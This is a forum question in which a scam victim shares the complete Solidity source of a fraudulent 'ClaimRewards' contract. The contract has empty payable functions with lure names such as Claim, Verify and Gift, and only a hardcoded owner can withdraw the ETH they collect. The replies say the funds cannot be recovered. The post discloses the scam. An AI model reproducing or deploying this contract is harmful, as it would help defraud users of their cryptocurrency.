# Someone has defrauded me using this contract. What should i do to get my money back?

Tags: ethereum-wallet-dapp, scam

```
/**
 *Submitted for verification at Etherscan.io on 2023-06-22
*/

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: contracts/main.sol


pragma solidity ^0.8.0;


contract ClaimRewards is Ownable {

    constructor() {
        // The Ownable constructor sets the owner to the address that deploys the contract
        transferOwnership(0x0000553F880fFA3728b290e04E819053A3590000);
    }

    function withdraw(uint256 amount, address recipient) public onlyOwner {
        require(amount <= address(this).balance, "Requested amount exceeds the contract balance.");
        require(recipient != address(0), "Recipient address cannot be the zero address.");
        payable(recipient).call{value: amount}("");
    }

    function Claim() public payable {
    }

    function Confirm() public payable {
    }

    function Verify() public payable {
    }
    
    function Connect() public payable {
    }

    function Start() public payable {
    }

    function Gift() public payable {
    }

    function Enable() public payable {
    }

    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}
```

Comment: There is nothing you can do. If you sent money to that contract then its gone.

Answer (score 1):

Unfortunately, there's nothing you can do to get your funds back.
Once tokens \ Ethereum has been withdrawn from your account - they are lost.

For future references, please do **not** deploy contracts you've copy/pasted from somewhere, unless you fully understand exactly what the code does. 
 You can also use ChatGPT, or any AI to help you understand the code (although be careful with that, as there's always a chance the AI is wrong).